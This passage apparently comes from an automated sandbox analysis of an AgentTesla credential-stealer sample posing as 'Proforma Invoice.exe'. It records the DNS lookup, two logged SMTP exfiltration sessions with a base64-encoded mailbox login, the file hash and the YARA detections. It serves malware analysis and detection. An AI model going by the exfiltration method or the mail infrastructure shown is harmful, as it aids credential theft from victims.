                                                                                  Oct 14, 2021 05:20:53.165122032 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.222656012 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.223586082 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.301810980 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.302635908 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.359736919 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.360028028 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.420150995 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.420588017 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.477523088 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.477816105 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.478836060 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.478951931 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.479655027 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.479703903 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:53.535830021 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.536479950 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.542679071 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:53.585494995 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:54.913331032 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:54.971801043 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:54.972239017 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:54.972598076 CEST49841587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:54.974750996 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.029407024 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.031656981 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.031912088 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.091969967 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.092401028 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.149497986 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.150111914 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.207438946 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.208462954 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.271754026 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.272250891 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.329298973 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.330032110 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.390760899 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.391385078 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.448431969 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.448453903 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.450719118 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.450867891 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451014042 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451143980 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451366901 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451478004 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451586962 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451704025 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.507569075 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.507869959 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.508111000 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.508126020 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.512649059 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.554497004 CEST49842587192.168.2.3185.8.128.141

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 14, 2021 05:20:52.179286957 CEST5854053192.168.2.38.8.8.8
                                                                                  Oct 14, 2021 05:20:52.264353991 CEST53585408.8.8.8192.168.2.3

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Oct 14, 2021 05:20:52.179286957 CEST192.168.2.38.8.8.80x65b2Standard query (0)webmail.karanex.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Oct 14, 2021 05:20:52.264353991 CEST8.8.8.8192.168.2.30x65b2No error (0)webmail.karanex.com185.8.128.141A (IP address)IN (0x0001)

                                                                                  SMTP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Oct 14, 2021 05:20:53.105591059 CEST58749841185.8.128.141192.168.2.3220-feronia.alastyr.com ESMTP Exim 4.94.2 #2 Thu, 14 Oct 2021 06:20:51 +0300
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Oct 14, 2021 05:20:53.106681108 CEST49841587192.168.2.3185.8.128.141EHLO 899552
                                                                                  Oct 14, 2021 05:20:53.163875103 CEST58749841185.8.128.141192.168.2.3250-feronia.alastyr.com Hello 899552 [102.129.143.33]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPE_CONNECT
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Oct 14, 2021 05:20:53.165122032 CEST49841587192.168.2.3185.8.128.141AUTH login a2VuZGFrZW5kYUBrYXJhbmV4LmNvbQ==
                                                                                  Oct 14, 2021 05:20:53.222656012 CEST58749841185.8.128.141192.168.2.3334 UGFzc3dvcmQ6
                                                                                  Oct 14, 2021 05:20:53.301810980 CEST58749841185.8.128.141192.168.2.3235 Authentication succeeded
                                                                                  Oct 14, 2021 05:20:53.302635908 CEST49841587192.168.2.3185.8.128.141MAIL FROM:<kendakenda@karanex.com>
                                                                                  Oct 14, 2021 05:20:53.359736919 CEST58749841185.8.128.141192.168.2.3250 OK
                                                                                  Oct 14, 2021 05:20:53.360028028 CEST49841587192.168.2.3185.8.128.141RCPT TO:<kendakenda@karanex.com>
                                                                                  Oct 14, 2021 05:20:53.420150995 CEST58749841185.8.128.141192.168.2.3250 Accepted
                                                                                  Oct 14, 2021 05:20:53.420588017 CEST49841587192.168.2.3185.8.128.141DATA
                                                                                  Oct 14, 2021 05:20:53.477816105 CEST58749841185.8.128.141192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                                  Oct 14, 2021 05:20:53.479703903 CEST49841587192.168.2.3185.8.128.141.
                                                                                  Oct 14, 2021 05:20:53.542679071 CEST58749841185.8.128.141192.168.2.3250 OK id=1marIa-008l8N-7s
                                                                                  Oct 14, 2021 05:20:54.913331032 CEST49841587192.168.2.3185.8.128.141QUIT
                                                                                  Oct 14, 2021 05:20:54.971801043 CEST58749841185.8.128.141192.168.2.3221 feronia.alastyr.com closing connection
                                                                                  Oct 14, 2021 05:20:55.091969967 CEST58749842185.8.128.141192.168.2.3220-feronia.alastyr.com ESMTP Exim 4.94.2 #2 Thu, 14 Oct 2021 06:20:53 +0300
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Oct 14, 2021 05:20:55.092401028 CEST49842587192.168.2.3185.8.128.141EHLO 899552
                                                                                  Oct 14, 2021 05:20:55.149497986 CEST58749842185.8.128.141192.168.2.3250-feronia.alastyr.com Hello 899552 [102.129.143.33]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPE_CONNECT
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Oct 14, 2021 05:20:55.150111914 CEST49842587192.168.2.3185.8.128.141AUTH login a2VuZGFrZW5kYUBrYXJhbmV4LmNvbQ==
                                                                                  Oct 14, 2021 05:20:55.207438946 CEST58749842185.8.128.141192.168.2.3334 UGFzc3dvcmQ6
                                                                                  Oct 14, 2021 05:20:55.271754026 CEST58749842185.8.128.141192.168.2.3235 Authentication succeeded
                                                                                  Oct 14, 2021 05:20:55.272250891 CEST49842587192.168.2.3185.8.128.141MAIL FROM:<kendakenda@karanex.com>
                                                                                  Oct 14, 2021 05:20:55.329298973 CEST58749842185.8.128.141192.168.2.3250 OK
                                                                                  Oct 14, 2021 05:20:55.330032110 CEST49842587192.168.2.3185.8.128.141RCPT TO:<kendakenda@karanex.com>
                                                                                  Oct 14, 2021 05:20:55.390760899 CEST58749842185.8.128.141192.168.2.3250 Accepted
                                                                                  Oct 14, 2021 05:20:55.391385078 CEST49842587192.168.2.3185.8.128.141DATA
                                                                                  Oct 14, 2021 05:20:55.448453903 CEST58749842185.8.128.141192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                                  Oct 14, 2021 05:20:55.451704025 CEST49842587192.168.2.3185.8.128.141.
                                                                                  Oct 14, 2021 05:20:55.512649059 CEST58749842185.8.128.141192.168.2.3250 OK id=1marIc-008l8c-6v

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: Proforma Invoice.exe PID: 6844 Parent PID: 3796

                                                                                  General

                                                                                  Start time:05:19:08
                                                                                  Start date:14/10/2021
                                                                                  Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\Proforma Invoice.exe'
                                                                                  Imagebase:0x2a0000
                                                                                  File size:368128 bytes
                                                                                  MD5 hash:DD00DDE252A92512815C0D0D3679D1FD
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Analysis Process: Proforma Invoice.exe PID: 5608 Parent PID: 6844

                                                                                  General

                                                                                  Start time:05:19:14
                                                                                  Start date:14/10/2021
                                                                                  Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  Imagebase:0x2e0000
                                                                                  File size:368128 bytes
                                                                                  MD5 hash:DD00DDE252A92512815C0D0D3679D1FD
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  Analysis Process: Proforma Invoice.exe PID: 6804 Parent PID: 6844

                                                                                  General

                                                                                  Start time:05:19:15
                                                                                  Start date:14/10/2021
                                                                                  Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  Imagebase:0xb20000
                                                                                  File size:368128 bytes
                                                                                  MD5 hash:DD00DDE252A92512815C0D0D3679D1FD
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >